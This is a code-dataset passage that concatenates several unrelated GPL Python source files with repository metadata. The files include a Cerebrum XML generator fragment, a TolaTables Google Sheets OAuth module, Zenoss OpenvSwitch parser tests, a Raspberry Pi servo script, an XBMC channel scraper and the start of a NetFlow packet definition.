prefix = "hiof.no:%s:" % (cereconf.DEFAULT_INSTITUSJONSNR,)
value_template = "STRUCTURE:" + prefix + "%02d0000:emner:%s:%s"
key_template = "ROOM:" + prefix + "%02d0000:emner:%s:%s:%s:%s:%s:%s"
result = dict()
for (source,
entry_kind) in ((EduDataGetter(undenh_file, logger).iter_undenh,
"undenh",),
(EduDataGetter(undakt_file, logger).iter_undakt,
"undakt",)):
logger.debug("Mapping multisemester %s", entry_kind)
for entry in source():
attrs = lower(entry)
if "terminnr" not in attrs:
continue
if not timeslot_is_valid(attrs):
logger.debug("Ignoring '%s' - data too old/in the future: "
"attrs=%s", entry_kind, attrs)
continue
# Technically, this is cheating -- faknr_kontroll does not have to
# match whetever faculty info is in the emne-info.xml
structure = value_template % (int(attrs["faknr_kontroll"]),
attrs["arstall"],
attrs["terminkode"])
original = (attrs["arstall"], attrs["terminnr"])
attrs = count_back_semesters(attrs)
# remapped = (attrs["arstall"], attrs["terminnr"])
key = key_template % (int(attrs["faknr_kontroll"]),
attrs["arstall"],
attrs["terminkode"],
entry_kind,
attrs["emnekode"],
attrs["versjonskode"],
attrs["terminnr"])
if entry_kind == "undakt":
key = key + ":" + attrs["aktivitetkode"]
# Key may already be in result! This happens when terminnr=1 and
# terminnr=2 for the same undenh are in the file. The resulting
# IDs are the same, since we count back semesters, but the
# structure to which key is to be associated is NOT. Whichever is
# earliest must be used.
if key in result:
previous_year, previous_sem = result[key].split(":")[-2:]
if ((int(previous_year) > int(original[0])) or
(int(previous_year) == int(original[0]) and
previous_sem == "høst")):
result[key] = structure
else:
result[key] = structure
logger.debug("Connecting %s to %s", key, result[key])
return result
def main(inargs=None):
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('-x', '--xml-file', dest='xml_file',
help='XML-file to be generated',
required=True)
parser.add_argument('-e', '--undenh-file', dest='undenh_file',
help='Department XML-export from FS',
required=True)
parser.add_argument('-a', '--undakt-file', dest='undakt_file',
help='Activity XML-export from FS',
required=True)
parser.add_argument('-u', '--uname-suffix', dest='uname_suffix',
help='Username suffix to be added (default: None)',
default='')
Cerebrum.logutils.options.install_subparser(parser)
args = parser.parse_args(inargs)
Cerebrum.logutils.autoconf('cronjob', args)
global uname_suffix
uname_suffix = args.uname_suffix
db = Factory.get("Database")()
groups = collect_cf_groups(db)
multisemester_map = build_multisemester_mapping(args.undenh_file,
args.undakt_file)
tree = build_cf_tree(db, groups, multisemester_map)
generate_xml_file(args.xml_file, db, tree)
if __name__ == "__main__":
main()
|
unioslo/cerebrum
|
contrib/no/hiof/generate_fronter_xml.py
|
Python
|
gpl-2.0
| 62,391
|
class Model(object):
"model mixin, based on sklearn."
def __init__(self, sample_factory, hyperparameters):
self.sample_factory = sample_factory
self.hyperparams = hyperparameters
def fit(self, X, Y):
pass
|
cjacoby/ml-experiment
|
experiment/model.py
|
Python
|
gpl-2.0
| 245
|
import os, logging, httplib2, json, datetime
from django.core.urlresolvers import reverse, reverse_lazy
from django.http import HttpResponseRedirect, HttpResponseBadRequest, JsonResponse
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.utils import timezone
from oauth2client.client import flow_from_clientsecrets
from oauth2client.contrib.django_orm import Storage
from oauth2client.contrib import xsrfutil
from django.conf import settings
from django.views.decorators.csrf import csrf_protect
from .models import GoogleCredentialsModel
from apiclient.discovery import build
#import gdata.spreadsheets.client
from .models import Silo, Read, ReadType, ThirdPartyTokens, LabelValueStore, Tag
########################################################################################
###################### OBSOLETE - NOT IN USE ###########################################
# THE CODE IN THIS FILE IS KEPT ONLY FOR REFERENCE PURPOSES. ALL OF THE FUNCTIONALITY
# HAS BEEN MIGRATED TO VER. 4 OF GOOGLE SHEETS API. THE CODE IN THIS FILE IS USING VER. 3
# GOOGLE GSHEET API
########################################################################################
CLIENT_SECRETS = os.path.join(os.path.dirname(__file__), 'client_secrets.json')
FLOW = flow_from_clientsecrets(
CLIENT_SECRETS,
scope='https://www.googleapis.com/auth/drive https://spreadsheets.google.com/feeds https://www.googleapis.com/auth/spreadsheets',
redirect_uri=settings.GOOGLE_REDIRECT_URL)
#redirect_uri='http://localhost:8000/oauth2callback/')
def picker_view(request):
return render(request, 'picker.html')
def get_authorized_sp_client(credential_json):
# Create OAuth2Token for authorizing the SpreadsheetClient
token = gdata.gauth.OAuth2Token(
client_id = credential_json['client_id'],
client_secret = credential_json['client_secret'],
scope = 'https://spreadsheets.google.com/feeds',
user_agent = "TOLA",
access_token = credential_json['access_token'],
refresh_token = credential_json['refresh_token'])
# Instantiate the SpreadsheetClient object
sp_client = gdata.spreadsheets.client.SpreadsheetsClient(source="TOLA")
# authorize the SpreadsheetClient object
sp_client = token.authorize(sp_client)
return sp_client
def export_to_google_spreadsheet(credential_json, silo_id, spreadsheet_key):
sp_client = get_authorized_sp_client(credential_json)
# Create a WorksheetQuery object to allow for filtering for worksheets by the title
worksheet_query = gdata.spreadsheets.client.WorksheetQuery(title="Sheet1", title_exact=True)
# Get a feed of all worksheets in the specified spreadsheet that matches the worksheet_query
worksheets_feed = sp_client.get_worksheets(spreadsheet_key, query=worksheet_query)
#print("worksheets_feed: %s" % worksheets_feed)
# Retrieve the worksheet_key from the first match in the worksheets_feed object
worksheet_key = worksheets_feed.entry[0].id.text.rsplit("/", 1)[1]
#print("worksheet_key: %s" % worksheet_key)
silo_data = LabelValueStore.objects(silo_id=silo_id)
# Create a CellBatchUpdate object so that all cells update is sent as one http request
batch = gdata.spreadsheets.data.BuildBatchCellsUpdate(spreadsheet_key, worksheet_key)
col_index = 0
row_index = 1
col_info = {}
for row in silo_data:
row_index = row_index + 1
for i, col_name in enumerate(row):
if col_name not in col_info.keys():
col_index = col_index + 1
col_info[col_name] = col_index
batch.add_set_cell(1, col_index, col_name) #Add column names
#print("%s = %s - %s: %s" % (col_info[col_name], col_name, type(row[col_name]), row[col_name]))
val = row[col_name]
if col_name != "isd":
try:
#val = str(val)#.encode('ascii', 'ignore')
val = val.encode('ascii', 'xmlcharrefreplace')
except Exception as e:
try:
val = str(val)
except Exception as e1:
print(e)
print(val)
pass
batch.add_set_cell(row_index, col_info[col_name], val)
# By default a blank Google Spreadsheet has 26 columns but if our data has more column
# then add more columns to Google Spreadsheet otherwise there would be a 500 Error!
if col_index and col_index > 26:
worksheet = worksheets_feed.entry[0]
worksheet.col_count.text = str(col_index)
# Send the worksheet update call to Google Server
sp_client.update(worksheet, force=True)
try:
# Finally send the CellBatchUpdate object to Google
sp_client.batch(batch, force=True)
except Exception as e:
print("ERROR: %s" % e)
return False
return True
@login_required
def export_gsheet(request, id):
gsheet_endpoint = None
read_url = request.GET.get('link', None)
file_id = request.GET.get('resource_id', None)
if read_url == None or file_id == None:
messages.error(request, "A Google Spreadsheet is not selected to import data to it.")
return HttpResponseRedirect(reverse('listSilos'))
storage = Storage(GoogleCredentialsModel, 'id', request.user, 'credential')
credential = storage.get()
if credential is None or credential.invalid == True:
FLOW.params['state'] = xsrfutil.generate_token(settings.SECRET_KEY, request.user)
authorize_url = FLOW.step1_get_authorize_url()
#FLOW.params.update({'redirect_uri_after_step2': "/export_gsheet/%s/?link=%s&resource_id=%s" % (id, read_url, file_id)})
request.session['redirect_uri_after_step2'] = "/export_gsheet/%s/?link=%s&resource_id=%s" % (id, read_url, file_id)
return HttpResponseRedirect(authorize_url)
credential_json = json.loads(credential.to_json())
user = User.objects.get(username__exact=request.user)
gsheet_endpoint = None
read_type = ReadType.objects.get(read_type="Google Spreadsheet")
try:
gsheet_endpoint = Read.objects.get(silos__id=id, type=read_type, silos__owner=user.id, read_name='Google')
except Read.MultipleObjectsReturned:
gsheet_endpoints = Read.objects.get(silos__id=id, type=read_type, silos__owner=user.id, read_name='Google')
for endpoint in gsheet_endpoints:
if endpoint.resource_id:
gsheet_endpoint = endpoint
except Read.DoesNotExist:
gsheet_endpoint = Read(read_name="Google", type=read_type, owner=user)
gsheet_endpoint.save()
silo = Silo.objects.get(id=id)
silo.reads.add(gsheet_endpoint)
silo.save()
except Exception as e:
messages.error(request, "An error occured: %" % e.message)
if gsheet_endpoint.resource_id == "None" or gsheet_endpoint.resource_id == None:
gsheet_endpoint.resource_id = file_id
gsheet_endpoint.read_url = read_url
gsheet_endpoint.save()
#print("about to export to gsheet: %s" % gsheet_endpoint.resource_id)
if export_to_google_spreadsheet(credential_json, id, gsheet_endpoint.resource_id) == True:
link = "Your exported data is available at <a href=" + gsheet_endpoint.read_url + " target='_blank'>Google Spreadsheet</a>"
messages.success(request, link)
else:
messages.error(request, 'Something went wrong.')
return HttpResponseRedirect(reverse('listSilos'))
@login_required
def export_new_gsheet(request, id):
storage = Storage(GoogleCredentialsModel, 'id', request.user, 'credential')
credential = storage.get()
if credential is None or credential.invalid == True:
FLOW.params['state'] = xsrfutil.generate_token(settings.SECRET_KEY, request.user)
authorize_url = FLOW.step1_get_authorize_url()
#FLOW.params.update({'redirect_uri_after_step2': "/export_new_gsheet/%s/" % id})
request.session['redirect_uri_after_step2'] = "/export_new_gsheet/%s/" % id
return HttpResponseRedirect(authorize_url)
credential_json = json.loads(credential.to_json())
silo_id = id
silo_name = Silo.objects.get(pk=silo_id).name
http = httplib2.Http()
# Authorize the http object to be used with "Drive API" service object
http = credential.authorize(http)
# Build the Google Drive API service object
service = build("drive", "v2", http=http)
# The body of "insert" API call for creating a blank Google Spreadsheet
body = {
'title': silo_name,
'description': "Exported Data from Mercy Corps TolaData",
'mimeType': "application/vnd.google-apps.spreadsheet"
}
# Create a new blank Google Spreadsheet file in user's Google Drive
google_spreadsheet = service.files().insert(body=body).execute()
# Get the spreadsheet_key of the newly created Spreadsheet
spreadsheet_key = google_spreadsheet['id']
#print(spreadsheet_key)
if export_to_google_spreadsheet(credential_json, silo_id, spreadsheet_key) == True:
link = "Your exported data is available at <a href=" + google_spreadsheet['alternateLink'] + " target='_blank'>Google Spreadsheet</a>"
messages.success(request, link)
else:
messages.error(request, 'Something went wrong; try again.')
return HttpResponseRedirect(reverse('listSilos'))
def import_from_google_spreadsheet(credential_json, silo, spreadsheet_key):
sp_client = get_authorized_sp_client(credential_json)
# Create a WorksheetQuery object to allow for filtering for worksheets by the title
worksheet_query = gdata.spreadsheets.client.WorksheetQuery(title="Sheet1", title_exact=True)
# Get a feed of all worksheets in the specified spreadsheet that matches the worksheet_query
worksheets_feed = sp_client.get_worksheets(spreadsheet_key)
# Retrieve the worksheet_key from the first match in the worksheets_feed object
worksheet_key = worksheets_feed.entry[0].id.text.rsplit("/", 1)[1]
ws = worksheets_feed.entry[0]
#print '%s - rows %s - cols %s\n' % (ws.title.text, ws.row_count.text, ws.col_count.text)
lvs = LabelValueStore()
list_feed = sp_client.get_list_feed(spreadsheet_key, worksheet_key)
for row in list_feed.entry:
row_data = row.to_dict()
skip_row = False
for key, val in row_data.iteritems():
#if the value of unique column is already in existing_silo_data then skip the row
for unique_field in silo.unique_fields.all():
filter_criteria = {'silo_id': silo.id, unique_field.name: val}
if LabelValueStore.objects.filter(**filter_criteria).count() > 0:
skip_row = True
continue
if skip_row == True:
break
if key == "" or key is None or key == "silo_id": continue
elif key == "id" or key == "_id": key = "user_assigned_id"
elif key == "create_date": key = "created_date"
elif key == "edit_date": key = "editted_date"
setattr(lvs, key, val)
if skip_row == True:
continue
lvs.silo_id = silo.id
lvs.create_date = timezone.now()
lvs.save()
lvs = LabelValueStore()
return True
@login_required
def import_gsheet(request, id):
gsheet_endpoint = None
silo = None
read_url = request.GET.get('link', None)
file_id = request.GET.get('resource_id', None)
file_name = request.GET.get("name", "Google Sheet Import")
if read_url == None or file_id == None:
messages.error(request, "A Google Spreadsheet is not selected to import data from.")
return HttpResponseRedirect(reverse('index'))
storage = Storage(GoogleCredentialsModel, 'id', request.user, 'credential')
credential = storage.get()
if credential is None or credential.invalid == True:
FLOW.params['state'] = xsrfutil.generate_token(settings.SECRET_KEY, request.user)
authorize_url = FLOW.step1_get_authorize_url()
#FLOW.params.update({'redirect_uri_after_step2': "/export_gsheet/%s/?link=%s&resource_id=%s" % (id, read_url, file_id)})
request.session['redirect_uri_after_step2'] = "/import_gsheet/%s/?link=%s&resource_id=%s" % (id, read_url, file_id)
return HttpResponseRedirect(authorize_url)
credential_json = json.loads(credential.to_json())
user = User.objects.get(username__exact=request.user)
gsheet_endpoint = None
read_type = ReadType.objects.get(read_type="GSheet Import")
try:
silo = Silo.objects.get(id=id)
if silo.unique_fields.exists() == False:
messages.error(request, "A unique column must be specfied when importing to an existing table. <a href='%s'>Specify Unique Column</a>" % reverse_lazy('siloDetail', kwargs={"id": silo.id}))
return HttpResponseRedirect(request.META['HTTP_REFERER'])
except Silo.DoesNotExist:
silo = Silo(name=file_name, owner=request.user, public=False, description="Google Sheet Import")
silo.save()
try:
gsheet_endpoint = Read.objects.get(silos__id=id, type=read_type, silos__owner=user.id, resource_id=file_id, read_name='GSheet Import')
except Read.MultipleObjectsReturned:
messages.error(request, "There should not be multiple records for the same gsheet, silo, and owner")
except Read.DoesNotExist:
gsheet_endpoint = Read(read_name="GSheet Import", type=read_type, resource_id=file_id, owner=user)
gsheet_endpoint.read_url = read_url
gsheet_endpoint.save()
silo.reads.add(gsheet_endpoint)
silo.save()
except Exception as e:
messages.error(request, "An error occured: %" % e.message)
#print("about to export to gsheet: %s" % gsheet_endpoint.resource_id)
if import_from_google_spreadsheet(credential_json, silo, gsheet_endpoint.resource_id) == True:
link = "Your imported data is available at here. <a href='%s'>See the table</a>" % reverse_lazy('siloDetail', kwargs={"id": silo.id})
messages.success(request, link)
else:
messages.error(request, 'Something went wrong.')
#messages.success(request, "Now, it should import data from GSheet")
return HttpResponseRedirect(reverse('index'))
@login_required
def oauth2callback(request):
if not xsrfutil.validate_token(settings.SECRET_KEY, str(request.GET['state']), request.user):
return HttpResponseBadRequest()
credential = FLOW.step2_exchange(request.GET)
storage = Storage(GoogleCredentialsModel, 'id', request.user, 'credential')
storage.put(credential)
#print(credential.to_json())
redirect_url = request.session['redirect_uri_after_step2']
return HttpResponseRedirect(redirect_url)
|
mercycorps/TolaTables
|
silo/google_views.py
|
Python
|
gpl-2.0
| 14,947
|
###########################################################################
#
# This program is part of Zenoss Core, an open source monitoring platform.
# Copyright (C) 2015, Zenoss Inc.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2 or (at your
# option) any later version as published by the Free Software Foundation.
#
# For complete information please visit: http://www.zenoss.com/oss/
#
###########################################################################
from Products.ZenRRD.CommandParser import ParsedResults
from Products.ZenRRD.zencommand import Cmd, DataPointConfig
from Products.ZenTestCase.BaseTestCase import BaseTestCase
from ..parsers.BridgeStatistics import BridgeStatistics as BridgeStatisticsParser
from ..parsers.InterfaceStatistics import InterfaceStatistics as InterfaceStatisticsParser
from ..parsers.OVSStatus import OVSStatus as OVSStatusParser
from ..parsers.BridgePortStatus import BridgePortStatus as BPStatusParser
from ..parsers.InterfaceStatus import InterfaceStatus as IFStatusParser
from .util import loadData
class FakeCmdResult(object):
exitCode = None
output = None
stderr = None
def __init__(self, exitCode, output):
self.exitCode = exitCode
self.output = output
class TestParser(BaseTestCase):
def _getCmd(self, component, command, exitCode, filename, points):
cmd = Cmd()
# DeviceConfig no longer exists as of Zenoss 4.
try:
from Products.ZenRRD.zencommand import DeviceConfig
cmd.deviceConfig = DeviceConfig()
except ImportError:
from Products.ZenCollector.services.config import DeviceProxy
cmd.deviceConfig = DeviceProxy()
cmd.deviceConfig.device = 'testDevice'
cmd.component = component
cmd.command = command
cmd.eventClass = '/Cmd/Fail'
cmd.eventKey = 'interfaceIncomingBytes'
cmd.result = FakeCmdResult(exitCode, loadData(filename))
cmd.points = points
# Since we only consider the OVS records within cycleTime for event
# processing, we need to do something so that records for unittests
# will always be processed. This is achieved by
# setting a huge value for cycleTime
cmd.cycleTime = 1430000000
return cmd
def _getDumpAggregateCmd(self, exitCode, filename):
points = []
for dp_id in ('packet_count', 'byte_count', 'flow_count',):
dpc = DataPointConfig()
dpc.id = dp_id
dpc.component = 'bridges'
points.append(dpc)
cmd = self._getCmd(
'bridge-3fe10504-e059-4398-8b12-b7627e7b5b95',
'/usr/bin/ovs-ofctl dump-aggregate br-int',
exitCode, filename, points)
return cmd
def testDumpAggregate(self):
parser = BridgeStatisticsParser()
results = ParsedResults()
parser.processResults(
self._getDumpAggregateCmd(0, 'cmd_dump_aggregate.txt'),
results)
self.assertEquals(len(results.values), 3)
self.assertEquals(len(results.events), 0)
def testDumpAggregate_none(self):
parser = InterfaceStatisticsParser()
results = ParsedResults()
parser.processResults(
self._getDumpAggregateCmd(0, 'cmd_dump_aggregate_none.txt'),
results)
self.assertEquals(len(results.values), 0)
self.assertEquals(len(results.events), 0)
def _getListInterfacesCmd(self, exitCode, filename):
points = []
for dp_id in ('rx_bytes', 'tx_bytes', 'rx_packets', 'tx_packets'
'collisions', 'rx_dropped', 'tx_dropped',
'rx_crc_err', 'rx_frame_err', 'rx_errors', 'tx_errors',
):
dpc = DataPointConfig()
dpc.id = dp_id
dpc.component = 'interfaces'
points.append(dpc)
cmd = self._getCmd(
'interface-6898492f-2d2e-439e-9370-a0073a0669f8',
'/usr/bin/ovs-vsctl --columns=_uuid,statistics,external_ids,mac_in_use,name list interface',
exitCode, filename, points)
return cmd
def testListInterfaces(self):
parser = InterfaceStatisticsParser()
results = ParsedResults()
parser.processResults(
self._getListInterfacesCmd(0, 'cmd_list_interfaces.txt'),
results)
self.assertEquals(len(results.values), 9)
self.assertEquals(len(results.events), 0)
def testListInterfaces_none(self):
parser = InterfaceStatisticsParser()
results = ParsedResults()
parser.processResults(
self._getListInterfacesCmd(0, 'cmd_list_interfaces_none.txt'),
results)
self.assertEquals(len(results.values), 0)
self.assertEquals(len(results.events), 0)
def _getCentOSOVSRunningCmd(self, exitCode, filename):
points = []
cmd = self._getCmd(
'',
'/bin/echo "BEGIN" ; /sbin/service openvswitch status 2> /dev/null ; echo "SPLIT" ; /usr/bin/systemctl status openvswitch-nonetwork.service 2> /dev/null ; echo "SPLIT" ; /usr/bin/sudo service openvswitch-switch status 2> /dev/null ; echo "END"',
exitCode, filename, points)
return cmd
def testCentOS6NotRunning(self):
parser = OVSStatusParser()
results = ParsedResults()
parser.processResults(
self._getCentOSOVSRunningCmd(0, 'centos_6_ovs_not_running.txt'),
results)
self.assertEquals(len(results.values), 0)
self.assertEquals(len(results.events), 1)
def testCentOS6Running(self):
parser = OVSStatusParser()
results = ParsedResults()
parser.processResults(
self._getCentOSOVSRunningCmd(0, 'centos_6_ovs_running.txt'),
results)
self.assertEquals(len(results.values), 0)
self.assertEquals(len(results.events), 1)
def testCentOS7NotRunning(self):
parser = OVSStatusParser()
results = ParsedResults()
parser.processResults(
self._getCentOSOVSRunningCmd(0, 'centos_7_ovs_not_running.txt'),
results)
self.assertEquals(len(results.values), 0)
self.assertEquals(len(results.events), 1)
def testCentOS7Running(self):
parser = OVSStatusParser()
results = ParsedResults()
parser.processResults(
self._getCentOSOVSRunningCmd(0, 'centos_7_ovs_running.txt'),
results)
self.assertEquals(len(results.values), 0)
self.assertEquals(len(results.events), 1)
def _getBridgePortStatusCmd(self, exitCode, filename):
points = []
cmd = self._getCmd(
'',
'/usr/bin/sudo /usr/bin/ovsdb-tool show-log',
exitCode, filename, points)
return cmd
def testBridgePortStatus(self):
parser = BPStatusParser()
results = ParsedResults()
parser.processResults(
self._getBridgePortStatusCmd(0, 'bridge_port_status.txt'),
results)
self.assertEquals(len(results.values), 0)
self.assertEquals(len(results.events), 4)
def _getInterfaceStatusCmd(self, id, exitCode, filename):
points = []
cmd = self._getCmd(
id,
'/usr/bin/sudo /usr/bin/ovs-vsctl --columns=_uuid,admin_state,link_state list interface',
exitCode, filename, points)
return cmd
def testInterfaceStatusAUPIUP(self):
parser = IFStatusParser()
results = ParsedResults()
parser.processResults(
self._getInterfaceStatusCmd('interface-35da03b8-1f47-4e82-b89a-d06a866d522f',
0, 'iface_status.txt'),
results)
self.assertEquals(len(results.values), 0)
self.assertEquals(len(results.events), 1)
def testInterfaceStatusAUPIDOWN(self):
parser = IFStatusParser()
results = ParsedResults()
parser.processResults(
self._getInterfaceStatusCmd('interface-23128125-cc93-492e-9afd-b75334ad1cc8',
0, 'iface_status.txt'),
results)
self.assertEquals(len(results.values), 0)
self.assertEquals(len(results.events), 1)
def testInterfaceStatusADOWNIDOWN(self):
parser = IFStatusParser()
results = ParsedResults()
parser.processResults(
self._getInterfaceStatusCmd('interface-fb498511-3c18-4483-85d3-c4b3103719ca',
0, 'iface_status.txt'),
results)
self.assertEquals(len(results.values), 0)
self.assertEquals(len(results.events), 1)
def test_suite():
from unittest import TestSuite, makeSuite
suite = TestSuite()
suite.addTest(makeSuite(TestParser))
return suite
|
zenoss/ZenPacks.zenoss.OpenvSwitch
|
ZenPacks/zenoss/OpenvSwitch/tests/testParser.py
|
Python
|
gpl-2.0
| 8,979
|
# -*- coding: utf-8 -*-
#
# Copyright 2013 The cygit2 contributors
#
# This file is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2,
# as published by the Free Software Foundation.
#
# In addition to the permissions in the GNU General Public License,
# the authors give you unlimited permission to link the compiled
# version of this file into combinations with other programs,
# and to distribute those combinations without any restriction
# coming from the use of this file. (The General Public License
# restrictions do apply in other respects; for example, they cover
# modification of the file, and distribution when not linked into
# a combined executable.)
#
# This file is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; see the file COPYING. If not, write to
# the Free Software Foundation, 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301, USA.
import unittest
from cygit2.tests.fixtures import Cygit2RepositoryFixture
class TestCommit(Cygit2RepositoryFixture):
def setUp(self):
super(TestCommit, self).setUp()
ref = self.repo.lookup_reference('refs/heads/master')
self.commit = self.repo.lookup_commit(ref.oid)
def tearDown(self):
del self.commit
super(TestCommit, self).tearDown()
def test_get_committer(self):
committer = self.commit.committer
self.assertEqual(committer.name, 'Test User')
self.assertEqual(committer.email, 'test@users.invalid')
def test_get_author(self):
author = self.commit.author
self.assertEqual(author.name, 'Other User')
self.assertEqual(author.email, 'other@users.invalid')
if __name__ == '__main__':
unittest.main()
|
sjagoe/cygit2
|
cygit2/tests/test_commit.py
|
Python
|
gpl-2.0
| 2,027
|
class PlayerHand:
def __init__(self, player):
self.player = player
self.hand = []
def getHand(self):
return self.hand
def getPlayer(self):
return self.player
def addCard(self, card):
self.hand.append(card)
def discardCard(self, card):
self.hand.remove(card)
|
zmetcalf/Triple-Draw-Deuce-to-Seven-Lowball-Limit
|
triple_draw_poker/model/PlayerHand.py
|
Python
|
gpl-2.0
| 331
|
#!/usr/bin/python
import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BCM)
GPIO.setup(18, GPIO.OUT)
GPIO.setwarnings(False)
pwm = GPIO.PWM(18, 50) # channel = 18, frequency = 50Hz
# duty cycle is Pulse Width divided by Period
# Period at 50Hz is 0.02 or 20 milliseconds, or 20000 microseconds
PERIOD = float(20000.0)
# to center the servo, a 1500 microsecond pulse is used
# therefore, duty cycle = 1500 / 20000 = 0.075 = 7.5 %
def calc_dc(pulse_in_us):
return ((float(pulse_in_us) / PERIOD)*100.0)
pwm.start(calc_dc(500))
delay_period = 0.01
try:
while True:
for microseconds in range(50, 250):
duty_cycle = calc_dc(microseconds*10)
print('pulse1: '+str(microseconds*10)+' duty cycle: '+str(duty_cycle))
pwm.ChangeDutyCycle(duty_cycle)
time.sleep(delay_period)
except KeyboardInterrupt:
pwm.stop()
|
griffegg/servo_motors
|
servo-run-forever.py
|
Python
|
gpl-2.0
| 874
|
#===============================================================================
# Make global object available
#===============================================================================
import mediaitem
import contextmenu
import chn_class
from regexer import Regexer
from helpers import xmlhelper
from logger import Logger
from urihandler import UriHandler
#===============================================================================
# main Channel Class
#===============================================================================
class Channel(chn_class.Channel):
#===============================================================================
# define class variables
#===============================================================================
def InitialiseVariables(self, channelInfo):
"""Used for the initialisation of user defined parameters.
All should be present, but can be adjusted. If overridden by derived class
first call chn_class.Channel.InitialiseVariables(self, channelInfo) to make sure all
variables are initialised.
Returns:
True if OK
"""
# call base function first to ensure all variables are there
chn_class.Channel.InitialiseVariables(self, channelInfo)
self.mainListUri = "http://www.rtl.nl/system/s4m/ipadfd/d=ipad/fmt=adaptive/"
# there also is a nettv stream: http://iptv.rtl.nl/nettv/feed.xml
self.baseUrl = "http://www.rtl.nl/service/gemist/device/ipad/feed/index.xml"
self.noImage = "rtlimage.png"
self.requiresLogon = False
self.episodeSort = True
self.defaultPlayer = 'dvdplayer'
self.contextMenuItems = []
self.contextMenuItems.append(contextmenu.ContextMenuItem("Play using Mplayer", "CtMnPlayMplayer", itemTypes="video", completeStatus=True))
self.contextMenuItems.append(contextmenu.ContextMenuItem("Play using DVDPlayer", "CtMnPlayDVDPlayer", itemTypes="video", completeStatus=True))
self.episodeItemRegex = '<serieitem><itemsperserie_url>([^<]+)</itemsperserie_url><serienaam>([^<]+)</serienaam><seriescoverurl>([^<]+)</seriescoverurl><serieskey>([^<]+)</serieskey>'
self.videoItemRegex = '(<item>([\w\W]+?)</item>)'
self.mediaUrlRegex = 'BANDWIDTH=(\d+)\d{3}[^\n]+\W+([^\n]+.m3u8)'
#==============================================================================
# non standard items
return True
def CreateEpisodeItem(self, resultSet):
"""Creates a new MediaItem for an episode
Arguments:
resultSet : list[string] - the resultSet of the self.episodeItemRegex
Returns:
A new MediaItem of type 'folder'
This method creates a new MediaItem from the Regular Expression
results <resultSet>. The method should be implemented by derived classes
and are specific to the channel.
"""
# Logger.Trace("iRTL :: %s", resultSet)
item = mediaitem.MediaItem(resultSet[1], resultSet[0])
item.thumbUrl = resultSet[2]
item.icon = self.folderIcon
item.complete = True
return item
def CreateVideoItem(self, resultSet):
"""Creates a MediaItem of type 'video' using the resultSet from the regex.
Arguments:
resultSet : tuple (string) - the resultSet of the self.videoItemRegex
Returns:
A new MediaItem of type 'video' or 'audio' (despite the method's name)
This method creates a new MediaItem from the Regular Expression or Json
results <resultSet>. The method should be implemented by derived classes
and are specific to the channel.
If the item is completely processed an no further data needs to be fetched
the self.complete property should be set to True. If not set to True, the
self.UpdateVideoItem method is called if the item is focussed or selected
for playback.
"""
xml = resultSet[0]
xmlData = xmlhelper.XmlHelper(xml)
name = "%s - %s" % (xmlData.GetSingleNodeContent("episodetitel"), xmlData.GetSingleNodeContent("title"))
thumb = xmlData.GetSingleNodeContent("thumbnail")
url = xmlData.GetSingleNodeContent("movie")
date = xmlData.GetSingleNodeContent("broadcastdatetime")
item = mediaitem.MediaItem(name, url)
item.description = name
item.icon = self.icon
item.thumb = self.noImage
item.thumbUrl = thumb
item.type = 'video'
item.SetDate(date[0:4], date[5:7], date[8:10], date[11:13], date[14:16], date[17:20])
item.complete = False
return item
def UpdateVideoItem(self, item):
"""Updates an existing MediaItem with more data.
Arguments:
item : MediaItem - the MediaItem that needs to be updated
Returns:
The original item with more data added to it's properties.
Used to update none complete MediaItems (self.complete = False). This
could include opening the item's URL to fetch more data and then process that
data or retrieve it's real media-URL.
The method should at least:
* cache the thumbnail to disk (use self.noImage if no thumb is available).
* set at least one MediaItemPart with a single MediaStream.
* set self.complete = True.
if the returned item does not have a MediaItemPart then the self.complete flag
will automatically be set back to False.
"""
Logger.Debug('Starting UpdateVideoItem for %s (%s)', item.name, self.channelName)
item.thumb = self.CacheThumb(item.thumbUrl)
# load the details.
playlistdata = UriHandler.Open(item.url, proxy=self.proxy)
urls = Regexer.DoRegex(self.mediaUrlRegex, playlistdata)
# baseUrl from: http://us.rtl.nl/Thu14.RTL_D_110818_143155_190_Britt_Ymke_op_d.MiMe.ssm/Thu14.RTL_D_110818_143155_190_Britt_Ymke_op_d.MiMe.m3u8
baseUrl = item.url[0:item.url.rfind("/")]
Logger.Debug("Using baseUrl: %s", baseUrl)
part = item.CreateNewEmptyMediaPart()
for url in urls:
# Logger.Trace(url)
if "http" in url[1]:
mediaUrl = url[1]
else:
mediaUrl = "%s/%s" % (baseUrl, url[1])
part.AppendMediaStream(mediaUrl, url[0])
item.complete = True
return item
|
SMALLplayer/smallplayer-image-creator
|
storage/.xbmc/addons/net.rieter.xot.smallplayer.channel.rtlnl/rtlipad/chn_rtlipad.py
|
Python
|
gpl-2.0
| 6,614
|
#!/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'eduardo'
import os
import os.path
import logging
from .. import config
from .. import LBSociam
# Set to test environment
config.environment = 'test'
lbs = LBSociam()
test_dir = os.path.dirname(os.path.realpath(__file__))
log = logging.getLogger()
def setup_package():
"""
Setup test data for the package
"""
pass
def teardown_package():
"""
Remove test data
"""
pass
|
lightbase/LBSociam
|
lbsociam/tests/__init__.py
|
Python
|
gpl-2.0
| 461
|
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi <phil@secdev.org>
## This program is published under a GPLv2 license
"""
Cisco NetFlow protocol v1
"""
from kamene.fields import *
from kamene.packet import *
# Cisco Netflow Protocol version 1
class NetflowHeader(Packet):
name = "Netflow Header"
fields_desc = [ ShortField("version", 1) ]
class NetflowHeaderV1(Packet):
name = "Netflow Header V1"
fields_desc = [ ShortField("count", 0),
IntField("sysUptime", 0),
IntField("unixSecs", 0),
IntField("unixNanoSeconds", 0) ]
class NetflowRecordV1(Packet):
name = "Netflow Record"
fields_desc = [ IPField("ipsrc", "0.0.0.0"),
IPField("ipdst", "0.0.0.0"),
IPField("nexthop", "0.0.0.0"),
ShortField("inputIfIndex", 0),
ShortField("outpuIfIndex", 0),
